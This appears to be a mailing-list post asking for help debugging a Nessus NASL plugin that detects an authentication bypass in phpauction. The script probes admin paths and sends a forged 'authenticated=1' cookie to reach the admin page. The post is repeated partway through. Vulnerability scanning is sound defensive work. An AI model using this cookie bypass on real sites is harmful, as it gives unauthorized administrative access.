.. I tried to write a nasl for a bug in phpauction I found early this
year (http://www.securityfocus.com/bid/12069), but the nasl doesn't work
completely.
I sniffed the connection while executing the script and the script
successfully uses the bypass possibility, moves to every given
directory, but sadly the script doesn't recognize, that it successfully
logged in.
Maybe some of you guys would be so kind to have a look at it? Thanks in
advance.
Toby
# The script code starts here
include("http_func.inc");
include("http_keepalive.inc");
port = get_http_port(default:80);
if(!get_port_state(port))exit(0);
dirs = make_list( "/phpauction/admin", "/admin", "/auction/admin",
"auktion/admin", cgi_dirs());
foreach dir (dirs)
{
req = http_get(item:dir +"/admin.php", port:port);
res = http_keepalive_send_recv(port:port, data:req);
if( res == NULL ) exit(0);
if( "Passwort " >< res || "Password" >< res )
{
idx = stridx(req, string("\r\n\r\n"));
req = insstr(req, '\r\nCookie: authenticated=1;', idx, idx);
res = http_keepalive_send_recv(port:port, data:req);
if("Installation" >< res)
{
security_hole(port);
}
exit(0);
}
}
# eof
year (http://www.securityfocus.com/bid/12069), but the nasl doesn't work
completely.
I sniffed the connection while executing the script and the script
successfully uses the bypass possibility, moves to every given
directory, but sadly the script doesn't recognize, that it successfully
logged in.
Maybe some of you guys would be so kind to have a look at it? Thanks in
advance.
Toby
# The script code starts here
include("http_func.inc");
include("http_keepalive.inc");
port = get_http_port(default:80);
if(!get_port_state(port))exit(0);
dirs = make_list( "/phpauction/admin", "/admin", "/auction/admin",
"auktion/admin", cgi_dirs());
foreach dir (dirs)
{
req = http_get(item:dir +"/admin.php", port:port);
res = http_keepalive_send_recv(port:port, data:req);
if( res == NULL ) exit(0);
if( "Passwort " >< res || "Password" >< res )
{
idx = stridx(req, string("\r\n\r\n"));
req = insstr(req, '\r\nCookie: authenticated=1;', idx, idx);
res = http_keepalive_send_recv(port:port, data:req);
if("Installation" >< res)
{
security_hole(port);
}
exit(0);
}
}
# eof